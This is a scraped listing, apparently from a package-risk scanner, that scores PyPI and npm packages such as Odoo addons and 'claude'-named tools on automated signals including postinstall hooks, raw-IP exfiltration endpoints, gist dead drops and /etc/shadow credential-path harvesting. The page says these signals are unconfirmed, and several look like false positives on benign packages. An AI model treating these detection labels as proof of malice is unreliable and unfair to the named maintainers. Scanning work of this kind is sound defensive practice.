  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ultimate_sol-0.0.3/venv/Scripts/activate_this.py:24
  • BUNDLED_NATIVE_BINARY: Unexpected compiled binary 'ultimate_sol-0.0.3/venv/Scripts/base58.exe' in package archive

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
175 704d 85 343 ↑0.1/day
Very Risky
web3 npm 0.2.0 🪝 📡
Matched naming pattern: web3-web3-sdk
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 704
Code-only verdict: Unverified Signal (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 85/month, 21/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 343 lines, 11.7 kB across 3 files (MODERATE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('WEB3').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'openapi'
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in package/dist/index.js:79
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/index.js:90
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'openapi'
  • MISSING_SOURCE_REPOSITORY_URL
  • EXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in package/dist/index.js:79
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/dist/index.js:90

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
165 55d 73 26,770 ↑1.3/day
🐛 Potential Cross-Ecosystem Worm Very Risky
enginery pypi 0.5.0 Mathews-Tom 🪝 🐛
Claimed homepage: https://pypi.org/project/enginery/
Matched naming pattern: python-enginery-core
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 55
Registry downloads: 73/month, 8/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 26770 lines, 1.2 MB across 157 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (52 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in enginery-0.5.0/scripts/adversarial_capability_gate.py:67
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/check_docs_currency.py:101
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/fault_inject_ledger.py:149
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/fault_inject_workers.py:59
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/full_system_gate.py:997
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in enginery-0.5.0/scripts/full_system_gate.py:265
Static code signals:
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in enginery-0.5.0/scripts/adversarial_capability_gate.py:67
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/check_docs_currency.py:101
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/fault_inject_ledger.py:149
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/fault_inject_workers.py:59
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/full_system_gate.py:997
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in enginery-0.5.0/scripts/full_system_gate.py:265
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/release_consumer_smoke.py:18
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in enginery-0.5.0/scripts/release_gate.py:96

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
165 232d 276 101,045 ↑1.2/day
Very Risky
claude npm 2.10.2 Jurgen Calleja 🪝 🗄️
Claimed homepage: https://github.com/jurgencalleja/TLC#readme
Matched naming pattern: tlc-claude-code
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 232
Registry downloads: 276/month, 69/week (MODERATE_USAGE)
Codebase size: 101045 lines, 3.7 MB across 702 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'tlc-claude-code' matches AI hallucination template [tlc] + [claude] + [code].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • INFOPackage release verified with cryptographic build provenance (npm_slsa_sigstore). Guarantees authentic repository build pipeline and eliminates publisher domain spoofing risk.
  • MEDIUMPackage registered 225 days ago within the 1-year AI tool proliferation window.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node bin/postinstall.js'
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in package/server/lib/access-control.js:320 (+2 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/server/lib/agent-persistence.js:28 (+31 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/server/lib/api-provider.js:45 (+22 more occurrence(s) elsewhere)
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'node bin/postinstall.js'
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in package/server/lib/access-control.js:320 (+2 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/server/lib/agent-persistence.js:28 (+31 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/server/lib/api-provider.js:45 (+22 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/server/lib/audit-attribution.js:5 (+26 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/server/lib/audit-attribution.js:18 (+15 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENCODED_PAYLOAD: 'Buffer.from(..., 'base64')' found in package/server/lib/security/auth-security.js:91 (+5 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'require('http(s)')' found in package/server/lib/security/compose-templates.js:53 (+4 more occurrence(s) elsewhere)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
160 246d 12 7,610 ↑0.0/day
Very Risky
claude pypi 0.1.5 🪝
Claimed homepage: https://pypi.org/project/one_claude/
Matched naming pattern: python-claude-one
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 246
Code-only verdict: BENIGN_COMMUNITY (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 12/month, 5/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 7610 lines, 346.6 kB across 42 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'one-claude' matches AI hallucination template [python] + [claude] + [one].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 240 days ago within the 1-year AI tool proliferation window.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in one_claude-0.1.5/one_claude/cli.py:221
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in one_claude-0.1.5/one_claude/cli.py:356
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'GitHub Gists API Exfiltration (Dead Drop)' found in one_claude-0.1.5/one_claude/gist/api.py:9
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in one_claude-0.1.5/one_claude/gist/api.py:10
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in one_claude-0.1.5/one_claude/cli.py:221
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in one_claude-0.1.5/one_claude/cli.py:356
  • EXFILTRATION_DESTINATION_DETECTED: 'GitHub Gists API Exfiltration (Dead Drop)' found in one_claude-0.1.5/one_claude/gist/api.py:9
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in one_claude-0.1.5/one_claude/gist/api.py:10
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in one_claude-0.1.5/one_claude/gist/exporter.py:36
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in one_claude-0.1.5/one_claude/teleport/sandbox.py:30
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in one_claude-0.1.5/one_claude/tui/screens/gist_modals.py:123
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in one_claude-0.1.5/one_claude/tui/screens/home.py:603

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
160 359d 28 886 ↑0.1/day
Very Risky
claude npm 2.1.0 zuotongxue zuogl448@gmail.com gmail.com 🪝 🗄️
Claimed homepage: https://github.com/zuogl/claudeCodeConfigChanger#readme
Matched naming pattern: claude-claude-changer
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 359
Code-only verdict: Unverified Signal (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 28/month, 7/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 886 lines, 35.8 kB across 7 files (MODERATE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'zuogl448@gmail.com' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 352 days ago within the 1-year AI tool proliferation window.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'node postinstall.js'
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/bin/ccc-setup.js:6 (+3 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/bin/ccc-setup.js:50 (+2 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/bin/ccc-setup.js:32 (+4 more occurrence(s) elsewhere)
  • HIGHCREDENTIAL_PATH_HARVESTING: 'System Credentials (/etc/shadow, /etc/passwd)' found in package/bin/ccc.js:103
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'node postinstall.js'
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'require('child_process')' found in package/bin/ccc-setup.js:6 (+3 more occurrence(s) elsewhere)
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/bin/ccc-setup.js:50 (+2 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/bin/ccc-setup.js:32 (+4 more occurrence(s) elsewhere)
  • CREDENTIAL_PATH_HARVESTING: 'System Credentials (/etc/shadow, /etc/passwd)' found in package/bin/ccc.js:103

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
155 273d 23 56,373 ↑0.1/day
Very Risky
alexasomba pypi 1.1.6 OpenAPI Generator community techsupport@paystack.com paystack.com 🪝
Claimed homepage: https://pypi.org/project/alexasomba-paystack/
Matched naming pattern: python-alexasomba-paystack
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 273
Code-only verdict: BENIGN_COMMUNITY (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 23/month, 2/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 56373 lines, 2.9 MB across 485 files (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPublisher email domain '@paystack.com' matches package identifier token 'paystack', verifying identifiable third-party organization ownership.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • MEDIUMPackage registered 266 days ago within the 1-year AI tool proliferation window.
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in alexasomba_paystack-1.1.6/alexasomba_paystack/api/customer_api.py:671
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in alexasomba_paystack-1.1.6/alexasomba_paystack/api/plan_api.py:214
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in alexasomba_paystack-1.1.6/alexasomba_paystack/api/split_api.py:70
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in alexasomba_paystack-1.1.6/alexasomba_paystack/api/subaccount_api.py:212
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in alexasomba_paystack-1.1.6/alexasomba_paystack/api/subscription_api.py:509
Static code signals:
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in alexasomba_paystack-1.1.6/alexasomba_paystack/api/customer_api.py:671
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in alexasomba_paystack-1.1.6/alexasomba_paystack/api/plan_api.py:214
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in alexasomba_paystack-1.1.6/alexasomba_paystack/api/split_api.py:70
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in alexasomba_paystack-1.1.6/alexasomba_paystack/api/subaccount_api.py:212
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in alexasomba_paystack-1.1.6/alexasomba_paystack/api/subscription_api.py:509
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in alexasomba_paystack-1.1.6/alexasomba_paystack/api/transaction_api.py:720
  • OBFUSCATED_DYNAMIC_ACCESS: __import__() dynamic loading 'os' detected in alexasomba_paystack-1.1.6/setup.py:50

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
155 3355d 81 119 ↑0.0/day
Very Risky
base pypi 10.0.1.0.0.99.dev15 Akretion,Odoo Community Association (OCA) support@odoo-community.org odoo-community.org 🪝
Claimed homepage: https://www.akretion.com
Matched naming pattern: odoo10-base-attachment
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 3355
Registry downloads: 81/month, 4/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 119 lines, 4.6 kB across 4 files (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • INFOEstablished pre-AI legacy package registered 3348 days ago (predates modern AI hallucination waves).
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_attachment_base_synchronize-10.0.1.0.0.99.dev15-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_attachment_base_synchronize-10.0.1.0.0.99.dev15-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_attachment_base_synchronize-10.0.1.0.0.99.dev15-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_attachment_base_synchronize-10.0.1.0.0.99.dev15-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_attachment_base_synchronize-10.0.1.0.0.99.dev15-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_attachment_base_synchronize-10.0.1.0.0.99.dev15-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_attachment_base_synchronize-10.0.1.0.0.99.dev15-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_attachment_base_synchronize-10.0.1.0.0.99.dev15-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_attachment_base_synchronize-10.0.1.0.0.99.dev15-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_attachment_base_synchronize-10.0.1.0.0.99.dev15-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_attachment_base_synchronize-10.0.1.0.0.99.dev15-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_attachment_base_synchronize-10.0.1.0.0.99.dev15-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • SYNTAX_ERROR_IN_odoo/addons/attachment_base_synchronize/models/attachment.py: multiple exception types must be parenthesized (<unknown>, line 79)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
155 3356d 32 334 ↑0.0/day
Very Risky
base pypi 10.0.1.0.0 Tecnativa, Odoo Community Association (OCA) support@odoo-community.org odoo-community.org 🪝
Claimed homepage: https://www.tecnativa.com
Matched naming pattern: odoo10-base-base
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 3356
Registry downloads: 32/month, 7/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 334 lines, 14.4 kB across 8 files (MODERATE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • INFOEstablished pre-AI legacy package registered 3349 days ago (predates modern AI hallucination waves).
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_base_location_nuts-10.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;pep420 = sys.version_info > (3, 3);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo''
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_base_location_nuts-10.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;pep420 = sys.version_info > (3, 3);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo''
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_base_location_nuts-10.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;pep420 = sys.version_info > (3, 3);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo''
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_base_location_nuts-10.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;pep420 = sys.version_info > (3, 3);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo''
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_base_location_nuts-10.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;pep420 = sys.version_info > (3, 3);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo''
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_base_location_nuts-10.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;pep420 = sys.version_info > (3, 3);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo''
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_base_location_nuts-10.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;pep420 = sys.version_info > (3, 3);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo''
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_base_location_nuts-10.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;pep420 = sys.version_info > (3, 3);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo''
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_base_location_nuts-10.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;pep420 = sys.version_info > (3, 3);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo''
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_base_location_nuts-10.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;pep420 = sys.version_info > (3, 3);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo''
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_base_location_nuts-10.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;pep420 = sys.version_info > (3, 3);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo''
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_base_location_nuts-10.0.1.0.0-py2.7-nspkg.pth: 'import sys, types, os;pep420 = sys.version_info > (3, 3);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo''
  • SYNTAX_ERROR_IN_odoo/addons/base_location_nuts/wizard/nuts_import.py: multiple exception types must be parenthesized (<unknown>, line 122)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
155 3442d 51 116 ↑0.0/day
Very Risky
base pypi 9.0.1.0.0.99.dev37 Akretion,Odoo Community Association (OCA) support@odoo-community.org odoo-community.org 🪝
Claimed homepage: http://www.akretion.com/
Matched naming pattern: odoo9-base-attachment
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 3442
Registry downloads: 51/month, 9/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 116 lines, 4.5 kB across 4 files (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • INFOEstablished pre-AI legacy package registered 3436 days ago (predates modern AI hallucination waves).
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo9_addon_attachment_base_synchronize-9.0.1.0.0.99.dev37-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo9_addon_attachment_base_synchronize-9.0.1.0.0.99.dev37-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • HIGHSYNTAX_ERROR_IN_odoo_addons/attachment_base_synchronize/models/attachment.py: multiple exception types must be parenthesized (<unknown>, line 79)
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo9_addon_attachment_base_synchronize-9.0.1.0.0.99.dev37-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo9_addon_attachment_base_synchronize-9.0.1.0.0.99.dev37-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • SYNTAX_ERROR_IN_odoo_addons/attachment_base_synchronize/models/attachment.py: multiple exception types must be parenthesized (<unknown>, line 79)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
155 3443d 66 543 ↑0.0/day
Very Risky
base pypi 8.0.0.1.0.99.dev56 Akretion,Odoo Community Association (OCA) support@odoo-community.org odoo-community.org 🪝
Claimed homepage: http://www.akretion.com/
Matched naming pattern: odoo8-base-base
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 3443
Registry downloads: 66/month, 36/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 543 lines, 34.2 kB across 8 files (MODERATE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • INFOEstablished pre-AI legacy package registered 3436 days ago (predates modern AI hallucination waves).
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo8_addon_base_phone-8.0.0.1.0.99.dev56-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo8_addon_base_phone-8.0.0.1.0.99.dev56-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • HIGHSYNTAX_ERROR_IN_odoo_addons/base_phone/base_phone.py: multiple exception types must be parenthesized (<unknown>, line 109)
  • HIGHSYNTAX_ERROR_IN_odoo_addons/base_phone/wizard/reformat_all_phonenumbers.py: multiple exception types must be parenthesized (<unknown>, line 70)
  • INFOSubstantial functional codebase (543 LOC across 8 file(s)).
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo8_addon_base_phone-8.0.0.1.0.99.dev56-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo8_addon_base_phone-8.0.0.1.0.99.dev56-py3.8-nspkg.pth: 'import sys, types, os;has_mfs = sys.version_info > (3, 5);p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo'
  • SYNTAX_ERROR_IN_odoo_addons/base_phone/base_phone.py: multiple exception types must be parenthesized (<unknown>, line 109)
  • SYNTAX_ERROR_IN_odoo_addons/base_phone/wizard/reformat_all_phonenumbers.py: multiple exception types must be parenthesized (<unknown>, line 70)

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
155 3443d 66 471 ↑0.0/day
Very Risky
base pypi 10.0.0.1.0 🪝
Claimed homepage: http://www.akretion.com/
Matched naming pattern: odoo10-base-base
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 3443
Registry downloads: 66/month, 38/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 471 lines, 24.1 kB across 12 files (MODERATE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • INFOEstablished pre-AI legacy package registered 3437 days ago (predates modern AI hallucination waves).
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_base_phone-10.0.0.1.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo',));ie = os.path.exists(os.path.joi'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'os' imported in odoo10_addon_base_phone-10.0.0.1.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo',));ie = os.path.exists(os.path.joi'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in odoo10_addon_base_phone-10.0.0.1.0-py2.7-nspkg.pth: 'import sys, types, os;p = os.path.join(sys._getframe(1).f_locals['sitedir'], *('odoo', 'addons'));ie = os.path.exists(os'
